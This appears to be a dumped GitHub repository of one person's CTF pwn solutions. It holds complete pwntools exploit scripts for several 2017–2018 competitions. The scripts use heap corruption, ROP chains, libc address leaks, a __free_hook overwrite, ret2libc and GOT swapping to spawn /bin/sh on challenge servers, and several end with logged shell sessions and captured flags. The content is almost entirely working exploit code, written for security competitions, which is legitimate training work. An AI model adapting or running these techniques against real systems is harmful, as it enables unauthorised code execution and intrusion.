├── README.md ├── backdoor-ctf-2018 └── shelter │ ├── exploit.py │ └── shellter ├── google-ctf-2017 └── inst-prof │ ├── exploit.py │ └── inst_prof ├── security-fest-2017 └── braindump │ ├── braindump_a4538a4da335e7b2e84d18c3dfe1832e │ └── exploit.py ├── sharif-ctf-2018 ├── pwn125 │ ├── exploit.py │ ├── server.py │ └── suctfdb.so ├── pwn250 │ ├── exploit.py │ └── t00p_secrets └── pwn75 │ ├── exploit.py │ └── vuln4 └── tokyo-westerns-ctf-2017 └── swap ├── exploit.py └── swap-b878cc5ecf612cee902acdc91054486bb4cb3bb337a0cfbaf903ba8d35cfcd17 /README.md: -------------------------------------------------------------------------------- 1 | # ctf-solutions 2 | My solutions for pwn and reversing challenges 3 | -------------------------------------------------------------------------------- /backdoor-ctf-2018/shelter/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | r = process("./shellter") 4 | #r = remote("51.15.73.163", 8088) 5 | 6 | def menu(): 7 | return r.recvuntil("choice > ") 8 | 9 | 10 | def create(content): 11 | r.sendline("1") 12 | r.recvuntil("Enter content > ") 13 | r.send(content) 14 | r.recvuntil("Created at ") 15 | s = r.recvuntil(" !") 16 | return int(s[:-2], 16) 17 | 18 | 19 | def delete(index): 20 | r.sendline("2") 21 | r.recvuntil("delete note > ") 22 | r.sendline(str(index)) 23 | 24 | 25 | def help(): 26 | r.sendline("3") 27 | r.recvuntil("located at ") 28 | return int(r.recvline()[:-1], 16) 29 | 30 | 31 | menu() 32 | 33 | help_func_addr = help() 34 | get_shell_addr = help_func_addr - (0xc1a-0xa30) 35 | info("get_shell: %s" % hex(get_shell_addr)) 36 | menu() 37 | 38 | chunk_addr = create("A"*8) 39 | info("chunk_addr: %s" % hex(chunk_addr)) 40 | next_chunk_addr = chunk_addr + 0x100 41 | info("next_chunk: %s" % hex(next_chunk_addr)) 42 | menu() 43 | 44 | 45 | # create a fake function pointer -> &get_shell 46 | evil_chunk_addr = create(p64(next_chunk_addr+0x10) + p64(get_shell_addr)) 47 | menu() 48 | 49 | elems_addr = get_shell_addr + 0x201610 50 | evil_index = ((evil_chunk_addr + 0x8) - elems_addr) / 8 51 | delete(evil_index) 52 | 53 | r.interactive() 54 | 55 | 56 | -------------------------------------------------------------------------------- /backdoor-ctf-2018/shelter/shellter: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/ctf-solutions/500642560eb09b213f668e0f60c6b6b227b963ef/backdoor-ctf-2018/shelter/shellter -------------------------------------------------------------------------------- /google-ctf-2017/inst-prof/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #Run this several times to get a shell! 4 | 5 | while True: 6 | r = remote("inst-prof.ctfcompetition.com", 1337) 7 | r.recvline() 8 | s = "41b7 00c3 4989 fec3 4901 cec3 4d01 fec3 41c6 0631 41b7 01c3 4989 fec3 4901 cec3 4d01 fec3 41c6 06c0 41b7 02c3 4989 fec3 4901 cec3 4d01 fec3 41c6 0648 41b7 03c3 4989 fec3 4901 cec3 4d01 fec3 41c6 06bb 41b7 04c3 4989 fec3 4901 cec3 4d01 fec3 41c6 06d1 41b7 05c3 4989 fec3 4901 cec3 4d01 fec3 41c6 069d 41b7 06c3 4989 fec3 4901 cec3 4d01 fec3 41c6 0696 41b7 07c3 4989 fec3 4901 cec3 4d01 fec3 41c6 0691 41b7 08c3 4989 fec3 4901 cec3 4d01 fec3 41c6 06d0 41b7 09c3 4989 fec3 4901 cec3 4d01 fec3 41c6 068c 41b7 0ac3 4989 fec3 4901 cec3 4d01 fec3 41c6 0697 41b7 0bc3 4989 fec3 4901 cec3 4d01 fec3 41c6 06ff 41b7 0cc3 4989 fec3 4901 cec3 4d01 fec3 41c6 0648 41b7 0dc3 4989 fec3 4901 cec3 4d01 fec3 41c6 06f7 41b7 0ec3 4989 fec3 4901 cec3 4d01 fec3 41c6 06db 41b7 0fc3 4989 fec3 4901 cec3 4d01 fec3 41c6 0653 41b7 10c3 4989 fec3 4901 cec3 4d01 fec3 41c6 0654 41b7 11c3 4989 fec3 4901 cec3 4d01 fec3 41c6 065f 41b7 12c3 4989 fec3 4901 cec3 4d01 fec3 41c6 0699 41b7 13c3 4989 fec3 4901 cec3 4d01 fec3 41c6 0652 41b7 14c3 4989 fec3 4901 cec3 4d01 fec3 41c6 0657 41b7 15c3 4989 fec3 4901 cec3 4d01 fec3 41c6 0654 41b7 16c3 4989 fec3 4901 cec3 4d01 fec3 41c6 065e 41b7 17c3 4989 fec3 4901 cec3 4d01 fec3 41c6 06b0 41b7 18c3 4989 fec3 4901 cec3 4d01 fec3 41c6 063b 41b7 19c3 4989 fec3 4901 cec3 4d01 fec3 41c6 060f 41b7 1ac3 4989 fec3 4901 cec3 4d01 fec3 41c6 0605 4c8b 2c24 41b7 18c3 4d29 fdc3 b760 4155" 9 | s = s.replace(" ", "").decode("hex") 10 | r.send(s) 11 | r.interactive() 12 | 13 | #CTF{0v3r_4ND_0v3r_4ND_0v3r_4ND_0v3r} 14 | 15 | ''' 16 | Instructions used: 17 | 18 | mov r15b, 0 19 | ret 20 | mov r14, rdi 21 | ret 22 | add r14, rcx 23 | ret 24 | add r14, r15 25 | ret 26 | mov byte[r14], 0x31 27 | 28 | mov r15b, 1 29 | ret 30 | mov r14, rdi 31 | ret 32 | add r14, rcx 33 | ret 34 | add r14, r15 35 | ret 36 | mov byte[r14], 0xc0 37 | 38 | mov r15b, 2 39 | ret 40 | mov r14, rdi 41 | ret 42 | add r14, rcx 43 | ret 44 | add r14, r15 45 | ret 46 | mov byte[r14], 0x48 47 | 48 | mov r15b, 3 49 | ret 50 | mov r14, rdi 51 | ret 52 | add r14, rcx 53 | ret 54 | add r14, r15 55 | ret 56 | mov byte[r14], 0xbb 57 | 58 | mov r15b, 4 59 | ret 60 | mov r14, rdi 61 | ret 62 | add r14, rcx 63 | ret 64 | add r14, r15 65 | ret 66 | mov byte[r14], 0xd1 67 | 68 | mov r15b, 5 69 | ret 70 | mov r14, rdi 71 | ret 72 | add r14, rcx 73 | ret 74 | add r14, r15 75 | ret 76 | mov byte[r14], 0x9d 77 | 78 | mov r15b, 6 79 | ret 80 | mov r14, rdi 81 | ret 82 | add r14, rcx 83 | ret 84 | add r14, r15 85 | ret 86 | mov byte[r14], 0x96 87 | 88 | mov r15b, 7 89 | ret 90 | mov r14, rdi 91 | ret 92 | add r14, rcx 93 | ret 94 | add r14, r15 95 | ret 96 | mov byte[r14], 0x91 97 | 98 | mov r15b, 8 99 | ret 100 | mov r14, rdi 101 | ret 102 | add r14, rcx 103 | ret 104 | add r14, r15 105 | ret 106 | mov byte[r14], 0xd0 107 | 108 | mov r15b, 9 109 | ret 110 | mov r14, rdi 111 | ret 112 | add r14, rcx 113 | ret 114 | add r14, r15 115 | ret 116 | mov byte[r14], 0x8c 117 | 118 | mov r15b, 10 119 | ret 120 | mov r14, rdi 121 | ret 122 | add r14, rcx 123 | ret 124 | add r14, r15 125 | ret 126 | mov byte[r14], 0x97 127 | 128 | mov r15b, 11 129 | ret 130 | mov r14, rdi 131 | ret 132 | add r14, rcx 133 | ret 134 | add r14, r15 135 | ret 136 | mov byte[r14], 0xff 137 | 138 | mov r15b, 12 139 | ret 140 | mov r14, rdi 141 | ret 142 | add r14, rcx 143 | ret 144 | add r14, r15 145 | ret 146 | mov byte[r14], 0x48 147 | 148 | mov r15b, 13 149 | ret 150 | mov r14, rdi 151 | ret 152 | add r14, rcx 153 | ret 154 | add r14, r15 155 | ret 156 | mov byte[r14], 0xf7 157 | 158 | mov r15b, 14 159 | ret 160 | mov r14, rdi 161 | ret 162 | add r14, rcx 163 | ret 164 | add r14, r15 165 | ret 166 | mov byte[r14], 0xdb 167 | 168 | mov r15b, 15 169 | ret 170 | mov r14, rdi 171 | ret 172 | add r14, rcx 173 | ret 174 | add r14, r15 175 | ret 176 | mov byte[r14], 0x53 177 | 178 | mov r15b, 16 179 | ret 180 | mov r14, rdi 181 | ret 182 | add r14, rcx 183 | ret 184 | add r14, r15 185 | ret 186 | mov byte[r14], 0x54 187 | 188 | mov r15b, 17 189 | ret 190 | mov r14, rdi 191 | ret 192 | add r14, rcx 193 | ret 194 | add r14, r15 195 | ret 196 | mov byte[r14], 0x5f 197 | 198 | mov r15b, 18 199 | ret 200 | mov r14, rdi 201 | ret 202 | add r14, rcx 203 | ret 204 | add r14, r15 205 | ret 206 | mov byte[r14], 0x99 207 | 208 | mov r15b, 19 209 | ret 210 | mov r14, rdi 211 | ret 212 | add r14, rcx 213 | ret 214 | add r14, r15 215 | ret 216 | mov byte[r14], 0x52 217 | 218 | mov r15b, 20 219 | ret 220 | mov r14, rdi 221 | ret 222 | add r14, rcx 223 | ret 224 | add r14, r15 225 | ret 226 | mov byte[r14], 0x57 227 | 228 | mov r15b, 21 229 | ret 230 | mov r14, rdi 231 | ret 232 | add r14, rcx 233 | ret 234 | add r14, r15 235 | ret 236 | mov byte[r14], 0x54 237 | 238 | mov r15b, 22 239 | ret 240 | mov r14, rdi 241 | ret 242 | add r14, rcx 243 | ret 244 | add r14, r15 245 | ret 246 | mov byte[r14], 0x5e 247 | 248 | mov r15b, 23 249 | ret 250 | mov r14, rdi 251 | ret 252 | add r14, rcx 253 | ret 254 | add r14, r15 255 | ret 256 | mov byte[r14], 0xb0 257 | 258 | mov r15b, 24 259 | ret 260 | mov r14, rdi 261 | ret 262 | add r14, rcx 263 | ret 264 | add r14, r15 265 | ret 266 | mov byte[r14], 0x3b 267 | 268 | mov r15b, 25 269 | ret 270 | mov r14, rdi 271 | ret 272 | add r14, rcx 273 | ret 274 | add r14, r15 275 | ret 276 | mov byte[r14], 0x0f 277 | 278 | mov r15b, 26 279 | ret 280 | mov r14, rdi 281 | ret 282 | add r14, rcx 283 | ret 284 | add r14, r15 285 | ret 286 | mov byte[r14], 0x05 287 | 288 | mov r13, [rsp] 289 | mov r15b, 0x18 290 | ret 291 | sub r13, r15 292 | ret 293 | mov bh, 0x60 294 | push r13 295 | ''' 296 | -------------------------------------------------------------------------------- /google-ctf-2017/inst-prof/inst_prof: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/ctf-solutions/500642560eb09b213f668e0f60c6b6b227b963ef/google-ctf-2017/inst-prof/inst_prof -------------------------------------------------------------------------------- /security-fest-2017/braindump/braindump_a4538a4da335e7b2e84d18c3dfe1832e: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/ctf-solutions/500642560eb09b213f668e0f60c6b6b227b963ef/security-fest-2017/braindump/braindump_a4538a4da335e7b2e84d18c3dfe1832e -------------------------------------------------------------------------------- /security-fest-2017/braindump/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | def movPtr(offset): 4 | if offset > 0: 5 | return "!>"*offset 6 | elif offset < 0: 7 | return "!<"*abs(offset) 8 | 9 | def putchar(): 10 | return "!:" 11 | 12 | def puts(size): 13 | s = "" 14 | for i in range(size): 15 | s += putchar() + movPtr(1) 16 | return s 17 | 18 | def write(n): 19 | s = "" 20 | for i in range(n): 21 | s += "!." + movPtr(1) 22 | return s 23 | 24 | #Gadgets 25 | POP_RDI = 0x400e93 26 | POP_RSI_POP_R15 = 0x400e91 27 | 28 | ROP_CHAIN_SIZE = 200 29 | RET_ADDRESS_OFFSET = 520 30 | BSS_ADDR = 0x6020E0 31 | 32 | 33 | r = remote("pwn.ctf.rocks", 31337) 34 | 35 | code = movPtr(RET_ADDRESS_OFFSET) 36 | code += puts(8) #leak libc 37 | code += movPtr(-8) #reset ptr 38 | 39 | code += write(ROP_CHAIN_SIZE) 40 | 41 | r.recvuntil("code:") 42 | r.sendline(code) 43 | 44 | s = r.recvuntil("\x00") 45 | libcMainAddr = u64(s.ljust(8, "\x00")) 46 | info("Leak: libc_start_main+240 %s" % hex(libcMainAddr)) 47 | openAddr = libcMainAddr + 875552 48 | readAddr = libcMainAddr + 876096 49 | getsAddr = libcMainAddr + 320848 50 | putsAddr = 0x400DF6 51 | 52 | #Rop chain 53 | rop = p64(POP_RDI) 54 | rop += p64(BSS_ADDR) 55 | rop += p64(getsAddr) 56 | rop += p64(POP_RDI) 57 | rop += p64(BSS_ADDR) 58 | rop += p64(POP_RSI_POP_R15) 59 | rop += p64(0x0) + p64(0xdeadbeef) 60 | rop += p64(openAddr) 61 | rop += p64(POP_RDI) 62 | rop += p64(3) 63 | rop += p64(POP_RSI_POP_R15) 64 | rop += p64(BSS_ADDR) 65 | rop += p64(0xdeadbeef) 66 | rop += p64(readAddr) 67 | rop += p64(POP_RDI) 68 | rop += p64(BSS_ADDR) 69 | rop += p64(putsAddr) 70 | 71 | r.send(rop.ljust(ROP_CHAIN_SIZE, "A")) 72 | 73 | r.recvuntil("RTFM!\n") 74 | 75 | r.sendline("/home/ctf/flag") 76 | 77 | s = r.recvline() 78 | info("Got flag! %s" % s[:s.find("}")+1]) 79 | 80 | r.close() 81 | 82 | #[+] Opening connection to pwn.ctf.rocks on port 31337: Done 83 | #[*] Leak: libc_start_main+240 0x7fb2c3ce0830 84 | #[*] Got flag! SCTF{0uT_oF_BoUNdZ_out_0F_c0ntr0lzZz} 85 | #[*] Closed connection to pwn.ctf.rocks port 31337 86 | -------------------------------------------------------------------------------- /sharif-ctf-2018/pwn125/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ''' 4 | Have you ever played with this *special* seq holder in Python? 5 | nc ctf.sharif.edu 22106 6 | Alternative: nc 213.233.161.38 22106 7 | ''' 8 | 9 | local = True 10 | 11 | if local: 12 | r = process("./server.py") 13 | else: 14 | r = remote("213.233.161.38", 22106) 15 | 16 | def menu(): 17 | r.recvuntil("Exit") 18 | 19 | def create_db(id, tag, l): 20 | r.sendline("1") 21 | r.sendline(str(id)) 22 | r.sendline(tag) 23 | r.sendline(str(l)) 24 | 25 | def edit_db(tag, seq=None): 26 | r.sendline("2") 27 | r.recvuntil("[2] seq") 28 | r.sendline("1") 29 | r.sendline(tag) 30 | 31 | def print_db(tag=True): 32 | r.sendline("3") 33 | r.recvuntil("[2] seq") 34 | if tag: 35 | r.sendline("1") 36 | r.recvuntil("tag: ") 37 | else: 38 | r.sendline("2") 39 | r.recvuntil("seq: ") 40 | return r.recvuntil("1.")[:-3] 41 | 42 | 43 | create_db(0, "", 20) 44 | menu() 45 | 46 | leak_s = print_db(tag=False) 47 | libc_leak = u64(leak_s.ljust(8, "\x00")) 48 | info("libc_leak: %s" % hex(libc_leak)) 49 | 50 | libc_offset = 0x7fa3043f7b88-0x00007fa304033000 51 | libc_base = libc_leak - libc_offset 52 | info("libc_base: %s" % hex(libc_base)) 53 | 54 | menu() 55 | 56 | writable_addr = 0x921010 57 | one_shot_shell = libc_base + 0x4526a 58 | edit_db("A"*8 + p64(0)+ p64(0) + p64(writable_addr) + p64(20) + p64(one_shot_shell) + p64(0)) # overflow and overwrite db method 59 | menu() 60 | 61 | r.sendline("5") 62 | 63 | r.interactive() 64 | 65 | ''' 66 | [+] Opening connection to 213.233.161.38 on port 22106: Done 67 | [*] libc_leak: 0x7f534050bb88 68 | [*] libc_base: 0x7f5340147000 69 | [*] Switching to interactive mode 70 | Enter selected menu> $ id 71 | uid=1001(suctf) gid=1001(suctf) groups=1001(suctf) 72 | $ cat /home/suctf/flag 73 | SharifCTF{0N3_M0R3_5T3P_70_**J1T**_H34V3N} 74 | ''' 75 | 76 | -------------------------------------------------------------------------------- /sharif-ctf-2018/pwn125/server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import suctfdb 4 | import numpy as np 5 | import sys 6 | 7 | db = None 8 | 9 | def menu(): 10 | print "1. Create DB" 11 | print "2. Edit DB specs" 12 | print "3. Print DB info" 13 | print "4. Delete DB" 14 | print "5. Run method" 15 | print "6. Exit" 16 | 17 | 18 | def create_db(): 19 | global db 20 | cid = int(raw_input("Enter id: ")) 21 | tag = raw_input("Enter tag: ") 22 | len = int(raw_input("Enter len: ")) 23 | db = suctfdb.DB(len, cid, tag) 24 | if db: 25 | print "DB craeted successfully" 26 | 27 | def delete_db(): 28 | global db 29 | del db 30 | db = None 31 | print "DB deleted successfully" 32 | 33 | def edit_db(): 34 | print "Which one to edit: " 35 | print "\t- [1] tag" 36 | print "\t- [2] seq" 37 | se = int(raw_input("Enter code: ")) 38 | if se == 1: 39 | tag = raw_input("Enter new tag: ") 40 | db.set_tag(tag) 41 | elif se == 2: 42 | t = int(raw_input("Enter 1 for np.array, 0 otherwise: ")) 43 | seq = raw_input("Enter new seq: ") 44 | if t == 1: 45 | db.set_seq(np.array(np.mat(seq)), 1) 46 | #print db.get_seq() 47 | else: 48 | db.set_seq(seq, 0) 49 | print "edit_db done" 50 | 51 | def print_db(): 52 | print "t", db.get_seq() 53 | print "Which one to print: " 54 | print "\t- [1] tag" 55 | print "\t- [2] seq" 56 | 57 | se = int(raw_input("Enter code: ")) 58 | print "DB->" 59 | print "\tid:", db.get_id() 60 | if se == 1: 61 | print "\ttag:", db.get_tag() 62 | elif se == 2: 63 | print "\tseq:", db.get_seq() 64 | 65 | 66 | 67 | def main(): 68 | 69 | print "WELCOME TO SUCTF SEQ HOLDER" 70 | while True: 71 | menu() 72 | try: 73 | i = int(raw_input("Enter selected menu> ")) 74 | if i == 1: 75 | create_db() 76 | elif i == 2: 77 | edit_db() 78 | elif i == 3: 79 | print_db() 80 | elif i == 4: 81 | delete_db() 82 | elif i == 5: 83 | print db.call_method() 84 | elif i == 6: 85 | break 86 | else: 87 | continue 88 | except Exception as e: 89 | #print "exc", e 90 | pass 91 | 92 | print "Good bye" 93 | return 0 94 | 95 | 96 | 97 | if __name__ == '__main__': 98 | sys.exit(main()) 99 | -------------------------------------------------------------------------------- /sharif-ctf-2018/pwn125/suctfdb.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/ctf-solutions/500642560eb09b213f668e0f60c6b6b227b963ef/sharif-ctf-2018/pwn125/suctfdb.so -------------------------------------------------------------------------------- /sharif-ctf-2018/pwn250/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ''' 4 | Someone has designed this top secret management service for us. He was insisting on the term `t00p`. Could you please take a look and find out why? 5 | nc ctf.sharif.edu 22107 6 | Alternative: nc 213.233.161.38 22107 7 | ''' 8 | 9 | local = True 10 | 11 | master_key = "wjigaep;r[jg]ahrg[es9hrg" 12 | 13 | if local: 14 | r = process("./t00p_secrets") 15 | else: 16 | r = remote("213.233.161.38", 22107) 17 | 18 | r.recvuntil("Enter your master key: ") 19 | r.sendline(master_key) 20 | 21 | 22 | def menu(): 23 | return r.recvuntil("> ") 24 | 25 | def create(idx, size, content, binary=True): 26 | r.sendline("1") 27 | r.recvuntil("Enter secret idx: ") 28 | r.sendline(str(idx)) 29 | r.recvuntil("Enter secret body size: ") 30 | r.sendline(str(size)) 31 | r.recvuntil("String(1): ") 32 | if binary: 33 | r.sendline("0") 34 | else: 35 | r.sendline("1") 36 | r.recvuntil("):") 37 | r.send(content) 38 | 39 | def edit(idx, content, binary=True): 40 | r.sendline("3") 41 | r.recvuntil("Please enter secret id to edit: ") 42 | r.sendline(str(idx)) 43 | r.recvuntil("String(1): ") 44 | if binary: 45 | r.sendline("0") 46 | else: 47 | r.sendline("1") 48 | r.recvuntil("content: ") 49 | r.send(content) 50 | 51 | 52 | def delete(idx): 53 | r.sendline("2") 54 | r.recvuntil("to delete: ") 55 | r.sendline(str(idx)) 56 | 57 | 58 | def print_secret(idx): 59 | r.sendline("5") 60 | r.recvuntil("Please enter secret id to print: ") 61 | r.sendline(str(idx)) 62 | s = r.recvuntil("1.")[:-3] 63 | if "No such secret!" in s: 64 | return "" 65 | index = s.find("content: ")+9 66 | return s[index:s.find("\n",index)] 67 | 68 | def change_master(master_key): 69 | r.sendline("7") 70 | r.recvuntil("Enter your master key: ") 71 | r.send(master_key) 72 | r.recvuntil("Enter your master key: ") 73 | r.send(master_key) 74 | 75 | 76 | menu() 77 | 78 | # leak libc address: 79 | create(0, 128, "A"*4) 80 | menu() 81 | 82 | create(1, 128, "B"*4) 83 | menu() 84 | 85 | create(2, 128, "C"*4) 86 | menu() 87 | 88 | delete(1) 89 | menu() 90 | 91 | create(1, 128, "A"*8) 92 | menu() 93 | 94 | s = print_secret(1) 95 | libc_address = u64(s[8:16]) 96 | info("libc leak: %s" % hex(libc_address)) 97 | 98 | libc_offset = 0x3c4b78 99 | 100 | libc_base = libc_address-libc_offset 101 | info("libc base: %s" % hex(libc_base)) 102 | 103 | # clean up 104 | delete(0) 105 | menu() 106 | 107 | delete(1) 108 | menu() 109 | 110 | delete(2) 111 | menu() 112 | 113 | # heap leak 114 | create(0, 16, "A"*4) 115 | menu() 116 | 117 | create(1, 16, "B"*4) 118 | menu() 119 | 120 | create(2, 16, "C"*4) 121 | menu() 122 | 123 | delete(1) 124 | menu() 125 | 126 | delete(0) 127 | menu() 128 | 129 | create(0, 8, "\x30") 130 | 131 | menu() 132 | 133 | s = print_secret(0) 134 | heap_address = u64(s[0:8].ljust(8, "\x00")) 135 | info("heap leak: %s" % hex(heap_address)) 136 | 137 | heap_base = heap_address-0x30 138 | info("heap_base: %s" % hex(heap_base)) 139 | 140 | # clean up 141 | delete(2) 142 | menu() 143 | 144 | delete(0) 145 | menu() 146 | 147 | # house of einherjar 148 | create(7, 0x100, "e") # size 149 | menu() 150 | 151 | create(4, 40, "a"*10) 152 | menu() 153 | 154 | create(5, 0xf8, "b"*10) 155 | menu() 156 | 157 | edit(4, "a"*40, False) # OBO 158 | menu() 159 | 160 | target = 0x602098 161 | 162 | evil_prev_size = (heap_base + 0x1b0)-(target) 163 | info("prev_size: %s" % hex(evil_prev_size)) 164 | edit(4, "a"*0x20 + p64(evil_prev_size), True) 165 | menu() 166 | 167 | new_master = p64(evil_prev_size) + p64(target) + p64(target) 168 | change_master(new_master) 169 | 170 | delete(5) 171 | menu() 172 | 173 | free_hook = libc_base + 0x3c67a8 174 | system = libc_base + 0x45390 175 | 176 | info("free_hook: %s" % hex(free_hook)) 177 | info("system: %s" % hex(system)) 178 | 179 | # write system to free_hook 180 | create(5, 512, "/bin/sh\x00".ljust((8*6), "\x00") + p64(free_hook)) 181 | menu() 182 | 183 | edit(4, p64(system)) 184 | menu() 185 | 186 | delete(5) 187 | 188 | r.interactive() 189 | 190 | ''' 191 | [+] Opening connection to 213.233.161.38 on port 22107: Done 192 | [*] libc leak: 0x7f7d4e8fcb78 193 | [*] libc base: 0x7f7d4e538000 194 | [*] heap leak: 0x237d030 195 | [*] heap_base: 0x237d000 196 | [*] prev_size: 0x1d7b118 197 | [*] free_hook: 0x7f7d4e8fe7a8 198 | [*] system: 0x7f7d4e57d390 199 | [*] Switching to interactive mode 200 | $ id 201 | uid=1001(suctf) gid=1001(suctf) groups=1001(suctf) 202 | $ cat /home/suctf/flag 203 | SharifCTF{R34V1L1NG_S3CR3T5_VI4_51NGL3_NULL_BY73} 204 | ''' 205 | -------------------------------------------------------------------------------- /sharif-ctf-2018/pwn250/t00p_secrets: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/ctf-solutions/500642560eb09b213f668e0f60c6b6b227b963ef/sharif-ctf-2018/pwn250/t00p_secrets -------------------------------------------------------------------------------- /sharif-ctf-2018/pwn75/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ''' 4 | It all started with a leak bang 5 | nc ctf.sharif.edu 4801 6 | Alternative: nc 213.233.161.38 4801 7 | ''' 8 | 9 | local = False 10 | 11 | if local: 12 | r = process("./vuln4") 13 | else: 14 | r = remote("213.233.161.38", 4801) 15 | 16 | # leak puts address 17 | puts_got = 0x8049874 18 | puts_plt = 0x80483A0 19 | main = 0x80484EA 20 | 21 | r.recvuntil("yourself\n") 22 | 23 | payload = "A"*22 + p32(puts_plt) + p32(main) + p32(puts_got) # return to main 24 | 25 | r.sendline(payload) 26 | 27 | s = r.recvuntil("This")[:-5] 28 | puts_libc = u32(s[0:4]) 29 | info("puts_libc = %s" % hex(puts_libc)) 30 | 31 | r.recvuntil("yourself\n") 32 | 33 | # system("/bin/sh") 34 | system_offset = 0x565b4ca0-0x5658fda0 35 | bin_sh_offset = 0x566b0a0b-0x565b4ca0 36 | 37 | system_libc = puts_libc - system_offset 38 | bin_sh = puts_libc + bin_sh_offset 39 | 40 | info("system_libc = %s" % hex(system_libc)) 41 | info("bin_sh = %s" % hex(bin_sh)) 42 | 43 | payload = "A"*22 + p32(system_libc) + p32(main) + p32(bin_sh) 44 | 45 | r.sendline(payload) 46 | 47 | r.interactive() 48 | 49 | ''' 50 | [*] puts_libc = 0xb75cbca0 51 | [*] system_libc = 0xb75a6da0 52 | [*] bin_sh = 0xb76c7a0b 53 | [*] Switching to interactive mode 54 | $ id 55 | uid=1002(ctfuser) gid=1002(ctfuser) groups=1002(ctfuser) 56 | $ cat /home/ctfuser/flag 57 | SharifCTF{7af9dab81dff481772609b97492d6899} 58 | ''' 59 | 60 | -------------------------------------------------------------------------------- /sharif-ctf-2018/pwn75/vuln4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/ctf-solutions/500642560eb09b213f668e0f60c6b6b227b963ef/sharif-ctf-2018/pwn75/vuln4 -------------------------------------------------------------------------------- /tokyo-westerns-ctf-2017/swap/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | local = True 4 | 5 | got_exit = 0x601058 6 | got_sleep = 0x601060 7 | got_puts = 0x601018 8 | got_atoi = 0x601050 9 | got_atoll = 0x601038 10 | 11 | buf_offset = 0x7fffffffe640-0x7fffffffe480 12 | 13 | system_offset = 0x7ffff7dd2641-0x7ffff7a52390 14 | 15 | if local: 16 | r = process("./swap-b878cc5ecf612cee902acdc91054486bb4cb3bb337a0cfbaf903ba8d35cfcd17") 17 | else: 18 | remote("pwn1.chal.ctf.westerns.tokyo", 19937) 19 | 20 | 21 | def menu(p=False): 22 | s = r.recvuntil("choice:") 23 | if p: 24 | print(s) 25 | return s 26 | 27 | def set_swap(a, b): 28 | r.send("1") 29 | r.recvuntil("1st addr\n") 30 | r.sendline(str(a)) 31 | r.recvuntil("2nd addr\n") 32 | r.sendline(str(b)) 33 | 34 | def swap(payload=None): 35 | if payload is None: 36 | r.send("2") 37 | else: 38 | r.send(payload) 39 | 40 | menu() 41 | 42 | set_swap(got_exit, got_sleep) 43 | menu() 44 | swap() 45 | menu() 46 | 47 | # swap puts and atoi in order to leak stack and libc addresses 48 | set_swap(got_puts, got_atoi) 49 | menu() 50 | swap() 51 | 52 | r.send("A") 53 | r.recvline() 54 | s = r.recvline() 55 | libc_rw_addr = u64(s[0:6].ljust(8, "\x00")) 56 | 57 | info("LEAK: libc rw = %s" % hex(libc_rw_addr)) 58 | 59 | r.send("A"*8) 60 | s = r.recvline() 61 | stack_addr = u64(s[8:14].ljust(8, "\x00")) 62 | 63 | info("LEAK: stack = %s" % hex(stack_addr)) 64 | 65 | # return 2 from puts to swap again 66 | r.send("A\x00") 67 | menu() 68 | 69 | system_addr = libc_rw_addr - system_offset 70 | info("system = %s" % hex(system_addr)) 71 | 72 | # atoll = system 73 | set_swap(stack_addr-buf_offset+8, got_atoll) 74 | menu() 75 | swap("2" + "\x00"*7 + p64(system_addr)) 76 | menu() 77 | 78 | r.sendline("1") 79 | r.recvuntil("1st addr") 80 | r.sendline("/bin/sh") 81 | 82 | r.interactive() 83 | -------------------------------------------------------------------------------- /tokyo-westerns-ctf-2017/swap/swap-b878cc5ecf612cee902acdc91054486bb4cb3bb337a0cfbaf903ba8d35cfcd17: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/ctf-solutions/500642560eb09b213f668e0f60c6b6b227b963ef/tokyo-westerns-ctf-2017/swap/swap-b878cc5ecf612cee902acdc91054486bb4cb3bb337a0cfbaf903ba8d35cfcd17 --------------------------------------------------------------------------------